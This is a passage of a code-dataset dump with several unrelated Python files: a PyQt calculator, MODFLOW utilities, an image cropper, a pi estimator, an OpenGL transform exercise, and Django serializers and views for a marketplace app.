'*':\n idx = i\n if self.display.text()[i] == '/':\n idx = i\n\n del1 = ''\n ## 첫째 인자에 0이 있는 경우\n count = 1\n print(idx)\n while self.display.text()[0] == '0':\n count += 1\n # 첫째 인자 0제거\n for i in range(1, len(self.display.text())):\n del0 += self.display.text()[i]\n self.display.setText(del0)\n # 둘째 인자 0 유무 확인\n while del0[idx + 1] == '0':\n # 0이 있네?\n for i in range(1, len(del0)):\n if i == idx:\n continue\n else:\n del1 += del0[i]\n self.display.setText(del1)\n # 둘째 인자에 0이 없는 경우\n else:\n self.display.setText(str(eval(del0)))\n\n ## 첫재 인자에 0이 없는우 경우\n else:\n ## 둘째 인자에 0이 있는 경우\n if self.display.text()[idx + 1] == 0:\n print('22')\n\n ## 둘째 인장에 0이 없는 경우\n else:\n try:\n result = str(eval(self.display.text()))\n except:\n result = 'Error!'\n self.display.setText(result)'''\n if key == '=':\n\n ## 계산 입력 후 값 초기화를 위해 init라는 리스트를 생성\n ## ZeroDivisionErro 처리\n if '/' in self.display.text():\n try:\n result = str(eval(self.display.text()))\n except ZeroDivisionError:\n result = 'ZeroDivisionError'\n init.append('clear')\n self.display.setText(result)\n\n\n else:\n try:\n result = str(eval(self.display.text()))\n except:\n result = 'Error!'\n init.append('clear')\n\n self.display.setText(result)\n\n\n elif key == 'C':\n self.display.clear()\n elif key == constantList[0]:\n self.display.setText(self.display.text() + '3.141592')\n elif key == constantList[1]:\n self.display.setText(self.display.text() + '3E+8')\n elif key == constantList[2]:\n self.display.setText(self.display.text() + '340')\n elif key == constantList[3]:\n self.display.setText(self.display.text() + '1.5E+8')\n elif key == functionList[0]:\n n = self.display.text()\n value = calcFunctions.factorial(n)\n self.display.setText(str(value))\n init.append('clear')\n elif key == functionList[1]:\n n = self.display.text()\n value = calcFunctions.decToBin(n)\n self.display.setText(str(value))\n elif key == functionList[2]:\n n = self.display.text()\n value = calcFunctions.binToDec(n)\n self.display.setText(str(value))\n elif key == functionList[3]:\n n = self.display.text()\n value = calcFunctions.decToRoman(n)\n self.display.setText(str(value))\n else:\n self.display.setText(self.display.text() + key) ## 계산 입력\n\n\nif __name__ == '__main__':\n\n import sys\n init = []\n app = QApplication(sys.argv)\n calc = Calculator()\n calc.show()\n sys.exit(app.exec_())\n\n\n'''elif '(' or ')' in self.display.text():\n result = ''\n while self.display.text()[0] == '(' or ')':\n for i in range(0, len(self.display.text()) - 1):\n self.display.text()[i] = self.display.text()[i+1]\n self.display.setText(self.display.text())\n while self.display.text()[-1] == '(' or ')':\n for i in range(0, len(self.display.text()) - 1):\n result += self.display.text()[i] '''","sub_path":"Week8/mycalc10.py","file_name":"mycalc10.py","file_ext":"py","file_size_in_byte":7693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"139720104","text":"# -*- coding: utf-8 -*-\n\"\"\"Misc utilities for MODFLOW.\"\"\"\n\n__all__ = [\"geotransform_from_flopy\"]\n\nimport pandas as pd\n\n\ndef sfr_rec_to_df(sfr):\n \"\"\"Convert flopy rec arrays for ds2 and ds6 to pandas dataframes.\"\"\"\n d = sfr.segment_data\n # multi index\n reform = {(i, j): d[i][j] for i in d.keys() for j in d[i].dtype.names}\n segdatadf = pd.DataFrame.from_dict(reform)\n segdatadf.columns.names = ['kper', 'col']\n reachdatadf = pd.DataFrame.from_records(sfr.reach_data)\n return segdatadf, reachdatadf\n\n\ndef sfr_dfs_to_rec(model, segdatadf, reachdatadf, set_outreaches=False,\n get_slopes=True, minslope=None):\n \"\"\"Convert sfr ds6 and ds2 to model sfr rec.\n\n Function to convert sfr ds6 (seg data) and ds2 (reach data) to model.sfr\n rec arrays option to update slopes from reachdata dataframes\n \"\"\"\n if get_slopes:\n print('Getting slopes')\n if minslope is None:\n minslope = 1.0e-4\n print('using default minslope of {}'.format(minslope))\n else:\n print('using specified minslope of {}'.format(minslope))\n # segs ds6\n # multiindex\n g = segdatadf.groupby(level=0, axis=1) # group multi index df by kper\n model.sfr.segment_data = g.apply(\n lambda k: k.xs(k.name, axis=1).to_records(index=False)).to_dict()\n # # reaches ds2\n model.sfr.reach_data = reachdatadf.to_records(index=False)\n if set_outreaches:\n # flopy method to set/fix outreaches from segment routing\n # and reach number information\n model.sfr.set_outreaches()\n if get_slopes:\n model.sfr.get_slopes(minimum_slope=minslope)\n # as of 08/03/2018 flopy plotting of sfr plots whatever is in\n # stress_period_data; add\n model.sfr.stress_period_data.data[0] = model.sfr.reach_data\n\n\ndef geotransform_from_flopy(m):\n \"\"\"Return GDAL-style geotransform from flopy model.\"\"\"\n try:\n import flopy\n except ImportError:\n raise ImportError('this method requires flopy')\n if not isinstance(m, flopy.mbase.BaseModel):\n raise TypeError(\"'m' must be a flopy model\")\n mg = m.modelgrid\n if mg.angrot != 0.0:\n raise NotImplementedError('rotated grids not supported')\n if mg.delr.min() != mg.delr.max():\n raise ValueError('delr not uniform')\n if mg.delc.min() != mg.delc.max():\n raise ValueError('delc not uniform')\n a = mg.delr[0]\n b = 0.0\n c = mg.xoffset\n d = 0.0\n e = -mg.delc[0]\n f = mg.yoffset - e * mg.nrow\n # GDAL order of affine transformation coefficients\n return c, a, b, f, d, e\n","sub_path":"swn/modflow/_misc.py","file_name":"_misc.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"528337196","text":"from PIL import Image\nimport os\n\ninput_directory = 'preprocessed-images-step-two'\noutput_directory = 'preprocessed-images-step-three'\n\nfor fh in os.listdir(input_directory):\n\tkey = 0\n\tif fh != '.DS_Store':\n\t\timg = Image.open(os.path.join(input_directory, fh))\t\n\t\twidth, height = img.size\n\t\tiwidth = int(width)\n\t\tiheight = int(height * 0.80)\n\t\tfor i in range(0, height, iheight):\n\t\t\tfor j in range(0, width, iwidth):\n\t\t\t\tif i == 0:\n\t\t\t\t\tbox = (j, height - iheight, j + iwidth, height)\n\t\t\t\t\tcropped_im = img.crop(box)\n\t\t\t\t\tcropped_im.save(os.path.join(output_directory, \"{}_crop_{}\".format(key, fh)))\n\t\t\t\t\tkey += 1\n\t\t\t\t\t\n\t\t\t\t\n\n\n","sub_path":"api/preprocess_images_step_two.py","file_name":"preprocess_images_step_two.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"367148662","text":"from random import random\nfrom math import sqrt\nimport time\ndarts = 100000\nhits=0\ntime.clock()\nfor i in range(1,darts+1):\n x,y=random(),random()\n dist=sqrt(x**2+y**2)\n if dist<=1.0:\n hits+=1\npi=4*(hits/darts)\nprint(\"Pi'value is {}\".format(pi) )\nprint(\"it takes :{:.5f}s\".format(time.clock()))\n","sub_path":"嵩天程序设计基础/pi.py","file_name":"pi.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"444633123","text":"import numpy as np\nimport glfw\nfrom OpenGL.GL import *\n\ndegree = 10.0 * np.pi / 180\ngComposedM = np.identity(3)\n\ndef key_callback(window, key, scancode, action, mods):\n global gComposedM\n if key == glfw.KEY_1:\n if action == glfw.PRESS:\n gComposedM = np.identity(3)\n elif key == glfw.KEY_Q:\n if action == glfw.PRESS:\n gComposedM[0][2] -= 0.1\n elif key == glfw.KEY_E:\n if action == glfw.PRESS:\n gComposedM[0][2] += 0.1\n elif key == glfw.KEY_A:\n if action == glfw.PRESS:\n counterClock = np.array([\n [np.cos(degree), -np.sin(degree), 0.],\n [np.sin(degree), np.cos(degree), 0.],\n [0., 0., 1.]\n ])\n gComposedM = gComposedM @ counterClock\n elif key == glfw.KEY_D:\n if action == glfw.PRESS:\n clock = np.array([\n [np.cos(degree), np.sin(degree), 0.],\n [-np.sin(degree), np.cos(degree), 0.],\n [0., 0., 1.]\n ])\n gComposedM = gComposedM @ clock\n elif key == glfw.KEY_W:\n if action == glfw.PRESS:\n scale = np.array([\n [0.9, 0., 0.],\n [0., 1., 0.],\n [0., 0., 1.]\n ])\n gComposedM = scale @ gComposedM\n elif key == glfw.KEY_S:\n if action == glfw.PRESS:\n counterClock = np.array([\n [np.cos(degree), -np.sin(degree), 0.],\n [np.sin(degree), np.cos(degree), 0.],\n [0., 0., 1.]\n ])\n gComposedM = counterClock @ gComposedM\n\ndef render(T):\n glClear(GL_COLOR_BUFFER_BIT)\n glLoadIdentity()\n # draw coordinate\n glBegin(GL_LINES)\n glColor3ub(255, 0, 0)\n glVertex2fv(np.array([0., 0.]))\n glVertex2fv(np.array([1., 0.]))\n glColor3ub(0, 255, 0)\n glVertex2fv(np.array([0., 0.]))\n glVertex2fv(np.array([0., 1.]))\n glEnd()\n # draw triangle\n glBegin(GL_TRIANGLES)\n glColor3ub(255, 255, 255)\n glVertex2fv( (T @ np.array([.0, .5, 1.]))[:-1])\n glVertex2fv( (T @ np.array([.0, .0, 1.]))[:-1])\n glVertex2fv( (T @ np.array([.5, .0, 1.]))[:-1])\n glEnd()\n\ndef main():\n if not glfw.init():\n return \n window = glfw.create_window(480, 480, \"2016025423-3-1\", None, None)\n if not window:\n glfw.terminate()\n return\n\n glfw.set_key_callback(window, key_callback)\n glfw.make_context_current(window)\n \n while not glfw.window_should_close(window):\n glfw.poll_events()\n render(gComposedM)\n \n glfw.swap_buffers(window)\n\n glfw.terminate()\n\nif __name__ == \"__main__\":\n main() \n","sub_path":"assignment03/2016025423-3-1.py","file_name":"2016025423-3-1.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"549158283","text":"from rest_framework import serializers, exceptions\nfrom core.utils import get_age_fun, test_thumbnail_image_url\nfrom crawler.models import CrawlProduct, CrawlDetailImage\nfrom mypage.serializers import SimpleUserInfoSerializer, DeliveryPolicyInfoSerializer\nfrom products.category.models import PopularTempKeyword\nfrom products.category.serializers import ColorSerializer, FirstCategorySerializer, SecondCategorySerializer, \\\n SizeSerializer\nfrom products.models import Product, ProductImages, ProductLike, ProdThumbnail\nfrom products.reply.serializers import ProductReplySerializer\nfrom products.shopping_mall.serializers import ShoppingMallSerializer\nfrom products.supplymentary.models import PurchasedReceipt, PurchasedTime\nfrom products.utils import check_product_url\nfrom user_activity.models import RecentlySearchedKeyword\n\n\nclass ProductFirstSaveSerializer(serializers.ModelSerializer):\n seller = serializers.HiddenField(default=serializers.CurrentUserDefault())\n\n class Meta:\n model = Product\n fields = ['seller', 'condition', 'shopping_mall', 'product_url']\n\n\nclass CrawlDataSerializer(serializers.ModelSerializer):\n \"\"\"\n 크롤링 데이터를 다루는 serializer 입니다.\n \"\"\"\n class Meta:\n model = CrawlProduct\n fields = ['thumbnail_image_url',\n 'product_name',\n 'int_price']\n\n\nclass TempCrawlDataSerializer(serializers.ModelSerializer):\n \"\"\"\n 크롤링 실패시 임시 데이터를 다루는 serializer 입니다.\n \"\"\"\n thumbnail_image_url = serializers.SerializerMethodField(read_only=True)\n product_name = serializers.SerializerMethodField(read_only=True)\n int_price = serializers.SerializerMethodField(read_only=True)\n\n class Meta:\n model = Product\n fields = ['thumbnail_image_url',\n 'product_name',\n 'int_price']\n\n @staticmethod\n def get_thumbnail_image_url(obj):\n return None\n\n @staticmethod\n def get_product_name(obj):\n return None\n\n @staticmethod\n def get_int_price(obj):\n return None\n\n\nclass ProductMainSerializer(serializers.ModelSerializer):\n \"\"\"\n 상품 메인페이지 및 찜한 상품 조회에 사용하는 serializer 입니다.\n [UPDATED] 20.08.06 : 할인율, 상품상태 등\n \"\"\"\n thumbnail_image_url = serializers.SerializerMethodField(read_only=True)\n is_owner = serializers.SerializerMethodField()\n sold = serializers.SerializerMethodField()\n\n # for develop\n price = serializers.SerializerMethodField()\n name = serializers.SerializerMethodField()\n\n discount_rate = serializers.SerializerMethodField()\n shopping_mall = serializers.SerializerMethodField()\n origin_price = serializers.SerializerMethodField()\n receipt_certify = serializers.SerializerMethodField()\n\n class Meta:\n model = Product\n fields = ['id',\n 'name',\n 'thumbnail_image_url',\n 'price',\n 'sold',\n 'is_owner',\n 'discount_rate',\n 'shopping_mall',\n 'origin_price',\n 'condition',\n 'receipt_certify'\n ]\n\n @staticmethod\n def get_receipt_certify(obj):\n if obj.receipt:\n return True\n return False\n\n @staticmethod\n def get_shopping_mall(obj):\n shopping_mall = obj.shopping_mall\n return ShoppingMallSerializer(shopping_mall).data\n\n def get_origin_price(self, obj):\n if not obj.crawl_product_id:\n return None\n if CrawlProduct.objects.filter(id=obj.crawl_product_id).exists():\n origin_price = CrawlProduct.objects.filter(id=obj.crawl_product_id).last().int_price\n else:\n return None\n return origin_price\n\n def get_price(self, obj):\n if obj.price:\n return obj.price\n return 0\n\n def get_discount_rate(self, obj):\n if not obj.crawl_product_id:\n return None\n if CrawlProduct.objects.filter(id=obj.crawl_product_id).exists():\n origin_price = CrawlProduct.objects.filter(id=obj.crawl_product_id).last().int_price\n else:\n return None\n price = obj.price\n rate = round(abs(origin_price - price) / origin_price, 2) * 100\n if not origin_price - price > 0:\n return None\n return rate\n\n def get_name(self, obj):\n if obj.name:\n return obj.name\n return '이름 없는 상품'\n\n def get_sold(self, obj):\n return obj.status.sold\n\n @staticmethod\n def get_thumbnail_image_url(obj):\n # TODO : filter Crawled image ratio\n if obj.crawl_product_id:\n c_product = CrawlProduct.objects.filter(id=obj.crawl_product_id)\n if c_product.exists():\n return CrawlProduct.objects.filter(id=obj.crawl_product_id).first().thumbnail_image_url\n\n if hasattr(obj, 'prodthumbnail'):\n return obj.prodthumbnail.image_url\n\n return obj.images.first().image_url\n\n def get_is_owner(self, obj):\n user = self.context['request'].user\n if obj.seller == user:\n return True\n return False\n\n\nclass ProductRetrieveSerializer(serializers.ModelSerializer):\n \"\"\"\n 상품 상세페이지 조회에 사용하는 serializer 입니다.\n \"\"\"\n thumbnail_image_url = serializers.SerializerMethodField()\n # crawl_data = serializers.SerializerMethodField()\n int_price = serializers.SerializerMethodField()\n receipt_image_url = serializers.SerializerMethodField()\n # name = serializers.SerializerMethodField()\n discount_rate = serializers.SerializerMethodField()\n is_receipt = serializers.SerializerMethodField()\n views = serializers.SerializerMethodField()\n like_count = serializers.SerializerMethodField()\n is_liked = serializers.SerializerMethodField()\n sold = serializers.SerializerMethodField()\n\n images = serializers.SerializerMethodField()\n crawled_images = serializers.SerializerMethodField()\n\n first_category = serializers.SerializerMethodField() # category 어떻게 보여줄지?\n second_category = serializers.SerializerMethodField() # category 어떻게 보여줄지?\n size = serializers.SerializerMethodField() # size name!\n color = serializers.SerializerMethodField()\n size_capture_image = serializers.SerializerMethodField() # 없으면 None\n purchased_year = serializers.SerializerMethodField()\n purchased_month = serializers.SerializerMethodField()\n\n shopping_mall = serializers.SerializerMethodField()\n\n replies = serializers.SerializerMethodField()\n\n age = serializers.SerializerMethodField() # ex: 3 days ago\n\n delivery_policy = serializers.SerializerMethodField()\n seller = SimpleUserInfoSerializer()\n\n # other_seller_products = serializers.SerializerMethodField() # def 안에 simple product serializer 활용하여 data return\n # related_products = serializers.SerializerMethodField() # \"\n\n class Meta:\n model = Product\n fields = ['id',\n 'possible_upload', # True 이면 보이고, False 이면 dim 처리\n 'sold',\n 'is_liked',\n 'thumbnail_image_url',\n 'int_price',\n 'valid_url', #\n 'age', #\n 'views', #\n 'like_count',\n # 'crawl_data', #\n 'is_receipt', #\n 'shopping_mall', # 쇼핑몰 로고?\n 'name', 'price', 'discount_rate', #\n 'free_delivery',\n 'content',\n 'images', #\n 'crawled_images',\n 'receipt_image_url', #\n 'first_category', #\n 'second_category', #\n 'size', #\n 'color',\n # 'purchased_year', #\n 'purchased_year', #\n 'purchased_month', #\n 'replies',\n 'product_url',\n 'delivery_policy',\n 'seller',\n 'size_capture_image',\n 'condition'\n # 'other_seller_products',\n # 'related_products'\n ]\n\n @staticmethod\n def get_thumbnail_image_url(obj):\n if not obj.crawl_product_id:\n return obj.images.first().image_url\n return CrawlProduct.objects.get(id=obj.crawl_product_id).thumbnail_image_url\n\n @staticmethod\n def get_valid_url(obj):\n url = obj.product_url\n valid_url = check_product_url(url)\n if valid_url:\n return True\n return False\n\n @staticmethod\n def get_age(obj):\n return get_age_fun(obj)\n\n @staticmethod\n def get_sold(obj):\n status = obj.status\n return status.sold\n\n @staticmethod\n def get_views(obj):\n if hasattr(obj, 'views'):\n return obj.views.view_counts\n return 0\n\n @staticmethod\n def get_like_count(obj):\n if obj.liked.exists():\n return obj.liked.all().count()\n return 0\n\n @staticmethod\n def get_int_price(obj):\n if obj.crawl_product_id:\n return CrawlProduct.objects.get(id=obj.crawl_product_id).int_price\n return None\n\n # @staticmethod\n # def get_crawl_data(obj):\n # if obj.crawl_product_id:\n # serializer = CrawlDataSerializer(CrawlProduct.objects.get(id=obj.crawl_product_id))\n # else:\n # serializer = TempCrawlDataSerializer(obj)\n # return serializer.data\n\n def get_is_liked(self, obj):\n user = self.context['request'].user\n if user.is_anonymous:\n return False\n liked = ProductLike.objects.filter(product=obj, user=user)\n if liked.exists():\n liked = liked.last()\n return liked.is_liked\n return False\n\n @staticmethod\n def get_is_receipt(obj):\n if obj.receipt:\n return True\n return False\n\n @staticmethod\n def get_discount_rate(obj):\n if obj.crawl_product_id:\n if CrawlProduct.objects.filter(id=obj.crawl_product_id).exists():\n crawl_price = CrawlProduct.objects.filter(id=obj.crawl_product_id).last().int_price\n else:\n return None\n price = obj.price\n if not price:\n return None\n rate = round(abs(crawl_price - price)/crawl_price, 2) * 100\n if crawl_price - price > 0:\n return rate\n return None\n\n @staticmethod\n def get_images(obj):\n if not obj.images.exists():\n return []\n images = obj.images.all()\n return ProductImagesRetrieveSerializer(images, many=True).data\n\n @staticmethod\n def get_crawled_images(obj):\n if not obj.crawl_product_id:\n return []\n c_product = CrawlProduct.objects.get(id=obj.crawl_product_id)\n d_images = CrawlDetailImage.objects.filter(product=c_product)\n\n if d_images.exclude(detail_image_crop='').exists():\n crop_image_id = d_images.exclude(detail_image_crop='').values_list('pk', flat=True)\n # to unify return formats. obj to queryset\n crop_image = CrawlDetailImage.objects.filter(id__in=crop_image_id)\n return CrawlProductCropImageRetrieveSerializer(crop_image, many=True).data\n\n # logic 필요\n d_image_center_id = int(round(d_images.count() / 2))\n if d_image_center_id < 4:\n detail_images = d_images\n else:\n detail_images = d_images[d_image_center_id-4:d_image_center_id+4]\n return CrawlProductImagesRetrieveSerializer(detail_images, many=True).data\n\n @staticmethod\n def get_receipt_image_url(obj):\n if obj.receipt:\n return obj.receipt.image_url\n else:\n return None\n\n @staticmethod\n def get_category(obj):\n if obj.category:\n f_category_name = obj.category.first_category.name\n return f_category_name + '>' + obj.category.name\n return None\n\n @staticmethod\n def get_first_category(obj):\n if obj.category:\n f_category = obj.category.first_category\n serializer = FirstCategorySerializer(f_category)\n return serializer.data\n return None\n\n @staticmethod\n def get_second_category(obj):\n if obj.category:\n serializer = SecondCategorySerializer(obj.category)\n return serializer.data\n return None\n\n @staticmethod\n def get_size(obj):\n if obj.size:\n serializer = SizeSerializer(obj.size)\n return serializer.data\n return None\n\n @staticmethod\n def get_color(obj):\n if obj.color:\n return ColorSerializer(obj.color).data\n return None\n\n @staticmethod\n def get_shopping_mall(obj):\n shopping_mall = obj.shopping_mall\n return ShoppingMallSerializer(shopping_mall).data\n\n @staticmethod\n def get_replies(obj):\n if obj.questions.exists():\n question = obj.questions.first()\n return ProductReplySerializer(question).data\n return None\n\n @staticmethod\n def get_purchased_year(obj):\n if obj.purchased_time:\n time = obj.purchased_time\n year = time.year\n return year\n return None\n\n @staticmethod\n def get_purchased_month(obj):\n if obj.purchased_time:\n time = obj.purchased_time\n month = time.month\n return month\n return None\n\n @staticmethod\n def get_delivery_policy(obj):\n seller = obj.seller\n if hasattr(seller, 'delivery_policy'):\n return DeliveryPolicyInfoSerializer(seller.delivery_policy).data\n return None\n\n @staticmethod\n def get_size_capture_image(obj):\n return None\n\n # @staticmethod\n # def get_other_seller_products(obj):\n # seller = obj.seller\n # other_products = Product.objects.filter(is_active=True, possible_upload=True) \\\n # .select_related('size', 'size__category', 'seller', 'seller__profile') \\\n # .exclude(id=obj.id) \\\n # .filter(seller=seller, status__sold=False) \\\n # .distinct().order_by('?')[:5]\n #\n # if not other_products:\n # return []\n # return RelatedProductSerializer(other_products, many=True).data\n #\n # @staticmethod\n # def get_related_products(obj):\n # second_category = obj.category\n # related_products = Product.objects.filter(is_active=True, possible_upload=True, temp_save=False) \\\n # .select_related('size', 'size__category', 'seller', 'seller__profile') \\\n # .exclude(id=obj.id) \\\n # .filter(category=second_category, status__sold=False) \\\n # .distinct().order_by('?')[:5]\n # if not related_products:\n # return []\n # return RelatedProductSerializer(related_products, many=True).data\n\n\nclass RelatedProductSerializer(serializers.ModelSerializer):\n thumbnail_image_url = serializers.SerializerMethodField()\n size = serializers.SerializerMethodField()\n\n class Meta:\n model = Product\n fields = ['id', 'thumbnail_image_url', 'size', 'price', 'name']\n\n @staticmethod\n def get_thumbnail_image_url(obj):\n if not obj.crawl_product_id:\n if hasattr(obj, 'prodthumbnail'):\n return obj.prodthumbnail.image_url\n # for develop\n try:\n return obj.images.first().image_url\n except:\n return test_thumbnail_image_url\n return CrawlProduct.objects.get(id=obj.crawl_product_id).thumbnail_image_url\n\n @staticmethod\n def get_size(obj):\n return obj.size.size_name\n\n\nclass ProductUploadDetailInfoSerializer(serializers.ModelSerializer):\n \"\"\"\n 상품 업로드 과정 중 크롤링된 정보 + (option)구매내역 key를 보여주는 serializer 입니다.\n 임시저장 불러올 때는 사용 x\n \"\"\"\n crawl_data = serializers.SerializerMethodField()\n receipt_image_url = serializers.SerializerMethodField()\n\n class Meta:\n model = Product\n fields = ['id',\n 'crawl_data',\n 'receipt_image_url',\n ]\n\n @staticmethod\n def get_receipt_image_url( obj):\n if obj.receipt:\n return obj.receipt.image_url\n else:\n return None\n\n @staticmethod\n def get_crawl_data(obj):\n if obj.crawl_product_id:\n serializer = CrawlDataSerializer(CrawlProduct.objects.get(id=obj.crawl_product_id))\n else:\n serializer = TempCrawlDataSerializer(obj)\n return serializer.data\n\n\nclass ProductTempUploadDetailInfoSerializer(serializers.ModelSerializer):\n \"\"\"\n 아마도 임시저장 불러올 때 사용할 것 같음. UploadDetail과 합쳐서 한번에 쓸 수 있었는데 분리한 이유는\n 임시저장의 경우 업로드 타입에 따라 아마 client에서 action을 다르게 해야 하기 떄문에 일단 구분함\n * 참고 :name 작성했던게 있으면 name, 없으면 crawl product name (crawl data 안의 product name은 사용 x)\n \n ** category, purchased_time 같이 다른 모델 참고하는 필드는 int(id) 주는데 클라에서 어떻게 할 건지 얘기필요\n \"\"\"\n receipt_image_url = serializers.SerializerMethodField()\n name = serializers.SerializerMethodField()\n crawl_data = serializers.SerializerMethodField()\n images = serializers.SerializerMethodField()\n purchased_year = serializers.SerializerMethodField()\n purchased_month = serializers.SerializerMethodField()\n\n class Meta:\n model = Product\n fields = ['id', 'condition', 'shopping_mall', 'product_url',\n 'crawl_data',\n 'receipt_image_url',\n 'images',\n 'name',\n 'price', 'content', 'free_delivery',\n 'category', 'color', 'size', 'purchased_year', 'purchased_month'\n ]\n\n @staticmethod\n def get_crawl_data(obj):\n if obj.crawl_product_id:\n serializer = CrawlDataSerializer(CrawlProduct.objects.get(id=obj.crawl_product_id))\n else:\n serializer = TempCrawlDataSerializer(obj)\n return serializer.data\n\n @staticmethod\n def get_receipt_image_url(obj):\n if obj.receipt:\n return obj.receipt.image_url\n else:\n return None\n\n @staticmethod\n def get_images(obj):\n if not obj.images.exists():\n return []\n images = obj.images.all()\n return ProductImagesRetrieveSerializer(images, many=True).data\n\n @staticmethod\n def get_name(obj):\n if obj.name:\n return obj.name\n if obj.crawl_product_id:\n return CrawlProduct.objects.get(id=obj.crawl_product_id).product_name\n return None\n\n @staticmethod\n def get_purchased_month(obj):\n if obj.purchased_time:\n time = obj.purchased_time\n month = time.month\n return month\n return None\n\n @staticmethod\n def get_purchased_year(obj):\n if obj.purchased_time:\n time = obj.purchased_time\n year = time.year\n return year\n return None\n\n\nclass ProductSaveSerializer(serializers.ModelSerializer):\n \"\"\"\n 상품 임시저장 및 최종저장 시 사용하는 serializer 입니다.\n * purchased time의 경우 purchased_year, purchased_month를 입력받아 서버에서 따로 저장합니다.\n * category 의 경우 second_category의 id 를 받습니다.\n \"\"\"\n class Meta:\n model = Product\n fields = ['name', 'price', 'content', 'free_delivery',\n 'category', 'color', 'size', 'possible_upload',\n 'temp_save' # view 에서 넘겨줌\n ]\n\n def update(self, obj, validated_data):\n year = validated_data.pop('purchased_year', None)\n month = validated_data.pop('purchased_month', None)\n product = super(ProductSaveSerializer, self).update(obj, validated_data)\n print(year, month)\n # purchased time save\n if year and month:\n time, _ = PurchasedTime.objects.get_or_create(year=int(year), month=int(month))\n print(time)\n product.purchased_time = time\n product.save()\n\n return product\n\n\nclass ReceiptSaveSerializer(serializers.ModelSerializer):\n class Meta:\n model = PurchasedReceipt\n fields = ['receipt_image_key']\n\n\nclass ProdThumbnailSerializer(serializers.ModelSerializer):\n class Meta:\n model = ProdThumbnail\n fields = ['thumbnail', ]\n\n\nclass ProductImageSaveSerializer(serializers.ModelSerializer):\n class Meta:\n model = ProductImages\n fields = '__all__'\n\n\nclass ProductImagesRetrieveSerializer(serializers.ModelSerializer):\n class Meta:\n model = ProductImages\n fields = ['image_url', ]\n\n\nclass CrawlProductImagesRetrieveSerializer(serializers.ModelSerializer):\n image_url = serializers.SerializerMethodField()\n\n class Meta:\n model = CrawlDetailImage\n fields = ['image_url', ]\n\n def get_image_url(self, obj):\n return obj.detail_image_url\n\n\nclass CrawlProductCropImageRetrieveSerializer(serializers.ModelSerializer):\n image_url = serializers.SerializerMethodField()\n\n class Meta:\n model = CrawlDetailImage\n fields = ['image_url', ]\n\n def get_image_url(self, obj):\n return obj.detail_image_crop_url\n\n\nclass LikeSerializer(serializers.ModelSerializer):\n class Meta:\n model = ProductLike\n fields = ['is_liked']\n\n\nclass RecentlySearchedKeywordSerializer(serializers.ModelSerializer):\n class Meta:\n model = RecentlySearchedKeyword\n fields = ['id', 'keyword']\n\nclass PopularTempKeywordSerializer(serializers.ModelSerializer):\n class Meta:\n model = PopularTempKeyword\n fields = ['id', 'keyword']\n\n\nclass SearchDefaultSerializer(serializers.Serializer):\n popular_keywords = serializers.SerializerMethodField()\n searched_keywords = serializers.SerializerMethodField()\n\n class Meta:\n fields = ['popular_keywords', 'searched_keywords']\n\n def get_popular_keywords(self):\n qs = PopularTempKeyword.objects.filter(is_active=True)[:3]\n print(qs)\n serializer = PopularTempKeywordSerializer(qs, many=True)\n return serializer.data\n\n def get_searched_keywords(self):\n user = self.context['request'].user\n if user.is_anonymous:\n return None\n qs = user.recently_searched_keywords.order_by('-updated_at')\n serializer = RecentlySearchedKeywordSerializer(qs, many=True)\n return serializer.data","sub_path":"siiot/products/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":23130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"254848099","text":"import os\n\nfrom mimetypes import guess_type\n\nfrom django.conf import settings\nfrom django.contrib import messages\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.shortcuts import render_to_response, RequestContext, Http404, HttpResponseRedirect, get_object_or_404\nfrom django.template.defaultfilters import slugify\nfrom django.forms.models import modelformset_factory\nfrom django.core.urlresolvers import reverse\nfrom django.db.models import Q\n\nfrom .models import Product, Category, ProductImage, Comment, Coupon\nfrom .forms import ProductForm, ProductImageForm, CommentForm, CouponForm, ProductImageFormSet\nfrom .helpers import product_url\n# create a list of all products to display it on all products page\ndef list_all(request):\n title = \"All Products\"\n products = Product.listing()\n return _all_products_page(request, locals())\n# search for products and display search results\ndef search_products(request):\n query = request.GET['query']\n products = Product.listing().filter(Q(description__icontains=query) | Q(title__icontains=query) | Q(headline__icontains=query) | Q(author__icontains=query) | Q(isbn_number__icontains=query))\n title = \"Products matching \\\"\" + query + \"\\\"\"\n return _all_products_page(request, locals())\n# create a list of categories to display products by categories\ndef category(request, slug):\n category = Category.objects.get(slug=slug)\n title = \"Products in \\\"\" + category.title + \"\\\"\"\n products = Product.listing().filter(category=category)\n return _all_products_page(request, locals())\n# render the all products page with categories, pagination, and sorting by price.\ndef _all_products_page(request, context):\n categories = Category.objects.all()\n order = _order(request)\n page = _paginate(context['products'].order_by(order), request)\n context.update(locals())\n return render_to_response(\"products/all.html\",\n context,\n context_instance=RequestContext(request))\n# create new products\ndef add_product(request):\n form = ProductForm(request.POST or None, request.FILES or None)\n image_form = ProductImageForm(request.POST or None, request.FILES or None)\n\n if form.is_valid() and image_form.is_valid():\n product = form.save(commit=False)\n product.user = request.user\n product.slug = slugify(form.cleaned_data['title'])\n product.save()\n image = image_form.save(commit=False)\n image.product = product\n image.featured_image = True\n image.save()\n return HttpResponseRedirect(product_url(product))\n\n return render_to_response(\"products/edit.html\", locals(), context_instance=RequestContext(request))\n# manage the product's images\ndef manage_product_image(request, id):\n product = Product.objects.get(id=id)\n\n if request.user != product.user:\n raise Http404\n\n # this queries the images and ensures that the correct image is selected\n queryset = ProductImage.objects.filter(product__id=id)\n formset = ProductImageFormSet(request.POST or None, request.FILES or None, queryset=queryset)\n\n if request.method == 'POST' and formset.is_valid():\n images = formset.save(commit=False)\n for image in images:\n image.product = product\n image.save()\n return HttpResponseRedirect(reverse('manage_product_image', args=[product.id]))\n\n return render_to_response(\"products/manage_images.html\", locals(), context_instance=RequestContext(request))\n# edit already created products.\ndef edit_product(request, id):\n instance = Product.objects.get(id=id)\n # this conditional ensures that only the product owners can edit the 